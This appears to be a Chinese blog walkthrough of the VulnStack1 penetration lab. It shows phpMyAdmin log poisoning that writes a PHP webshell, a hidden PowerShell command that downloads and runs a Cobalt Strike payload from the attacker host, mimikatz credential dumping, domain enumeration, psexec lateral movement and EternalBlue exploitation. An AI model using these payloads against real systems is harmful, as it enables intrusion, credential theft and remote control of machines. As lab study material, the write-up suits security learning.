VulnStack1-内网渗透记录

网络结构

kali 192.168.20.145
windows7 192.168.20.148/192.168.52.143
2008 192.168.52.138
Win2k3 192.168.52.130

三台虚拟机IP初始状态固定为192.168.52.0/24网段,所以将仅主机模式的网卡设置为192.168.52.0/24网段

漏洞利用

phpStudy

首先查看windows7的web服务,是phpStudy,此处测试到Mysql弱口令root/root

之后扫描目录发现/php,有熟悉的应该知道这个路径

通过弱口令进入phpMyAdmin

之后开始想可利用点,

首先可以想到Mysql-udf提权,有个限制条件就是secure-file-priv开启,

sql 复制代码
SHOW VARIABLES LIKE "secure_file_priv";

发现返回NULL,也就是禁止操作。为空就是不限定写入目录,如果有路径就是限制指定目录。

之后考虑phpstudy通过日志的提权,之前学习中也涉及到过日志中毒攻击(把一句话木马写入日志,服务器解析日志php文件)。

先查询下日志相关设置

sql 复制代码
SHOW  VARIABLES  LIKE  "general%"

general_log是日志文件开关,general_log_file日志保存在哪个路径。

把开关开启

网站路径也可以通过 select @@basedir获取Mysql储存数据库文件的路径

sql 复制代码
set global general_log = "ON"
set global general_log_file = "C:/phpStudy/WWW/log.php" /*网站路径在phpStudy探针页面可以找到,注意日志文件后缀为php类型*/

之后执行个带着一句话木马的SQL语句,写入log.php文件,让服务器解析就好了。

sql 复制代码
set '<?php $sl = create_function('', @$_REQUEST['klion']); $sl(); ?>';

YMCMS

蚁剑连接看网站目录发现还有一个yxCMS,可以访问查看下(另一个getshell方法)

访问http://192.168.20.148/yxcms/

在公告信息里就给出了后台路径和账号密码了,登进去看看

根据之前打vulnhub的思路,可以想到模板管理和文件上传的地方可能会出现getshell点。

因为我们现在已经拿到shell了,下面拿个修改模板举例子。

成功拿到shell

内网渗透

让windows7在CS上线

生成payload

powershell 复制代码
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.20.145:9999/a'))"

放在蚁剑执行,windows7在CS上线

运行shell systeminfo查看主机信息,可以看到god.org

之后用mimikatz尝试抓取明文密码

之后net view查看域内机器

bash 复制代码
net view                          #查看局域网内其他主机名
net config Workstation            #查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user                          #查看本机用户列表
net user /domain                  #查看域用户
net localgroup administrators     #查看本地管理员组(通常会有域用户)
net view /domain                  #查看有几个域
net user 用户名 /domain            #获取指定域用户的信息
net group /domain                 #查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
net group 组名 /domain                #查看域中某工作组
net group "domain admins" /domain     #查看域管理员的名字
net group "domain computers" /domain  #查看域中的其他主机名
net group "doamin controllers" /domain  # 查看域控制器主机名(可能有多台)

查看域管 administrator

查看域控 OWA

CS_psexec横向移动

添加smb的监听,进行横向

之后OWA上线

相同的可以上线windows2003

CS联动msf

kail上msf开启监听

CS新建监听器

win7靶机在msf上线

可以用run post/windows/gather/checkvm判断是否是虚拟机

这个靶场的配置kali应该是不能直接通2008和2003的,所以要设置静态路由通过拿到的session当作跳板机访问2008和2003

或者在session中使用

bash 复制代码
run autoroute -p  #查看路由
run autoroute -s 192.168.52.0/24

效果是一样的

永恒之蓝

msf自带的端口portscan扫描可以扫到2008的445端口,进行永恒之蓝尝试

漏洞扫描

发现漏洞进行利用

bash 复制代码
search ms17_010
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.52.138
set lport 5555
run

显示no session was created

尝试再开一个msf进行监听,也不行,攻击流程就是这样的。

相关推荐
Clockwiseee2 小时前
php伪协议
windows·安全·web安全·网络安全
唐宋元明清21883 小时前
.NET 阻止系统睡眠/息屏
windows·电源
yylの博客5 小时前
Windows通过git-bash安装zsh
windows·git·bash·zsh
进击的code5 小时前
windows 下使用WLS2 编译aosp Android14并刷机到pixle 5a
windows
染指11109 小时前
50.第二阶段x86游戏实战2-lua获取本地寻路,跨地图寻路和获取当前地图id
c++·windows·lua·游戏安全·反游戏外挂·游戏逆向·luastudio
dntktop10 小时前
Converseen:全能免费批量图像处理专家
windows
一个懒鬼11 小时前
Windows脚本清理C盘缓存
windows·缓存
蚁景网络安全12 小时前
Cobalt Strike 4.8 用户指南-第十四节 Aggressor 脚本
windows·microsoft
Camllia3713 小时前
电脑运行库DirectX出问题怎么办?
windows·经验分享·电脑
总是学不会.14 小时前
【集合】Java 8 - Stream API 17种常用操作与案例详解
java·windows·spring boot·mysql·intellij-idea·java集合